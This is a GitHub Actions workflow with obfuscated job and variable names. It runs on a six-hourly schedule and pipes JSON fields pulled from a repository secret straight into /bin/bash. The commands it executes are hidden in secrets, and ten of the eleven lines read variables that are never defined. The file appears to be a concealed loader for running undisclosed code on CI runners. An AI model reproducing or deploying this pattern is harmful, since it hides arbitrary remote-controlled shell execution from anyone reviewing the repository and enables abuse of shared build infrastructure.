name: yinzhiping2389
on:
  workflow_dispatch:
  schedule:
    - cron: '51 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinzhiping2389
        env:
          zz74: ${{ secrets.zz74 }}
        run: |
          echo $zz74 | jq -r .l729 | /bin/bash
          echo $r08991 | jq -r .tvs031 | /bin/bash
          echo $keekv82083 | jq -r .puboi0975 | /bin/bash
          echo $ine03264 | jq -r .ry6477 | /bin/bash
          echo $h32 | jq -r .nnn20 | /bin/bash
          echo $c07 | jq -r .jyd54 | /bin/bash
          echo $hp575 | jq -r .ieqax2 | /bin/bash
          echo $smfgp64 | jq -r .dlk87 | /bin/bash
          echo $jexz785 | jq -r .t0728 | /bin/bash
          echo $xqau95 | jq -r .bi3687 | /bin/bash
          echo $b72 | jq -r .mx83472 | /bin/bash

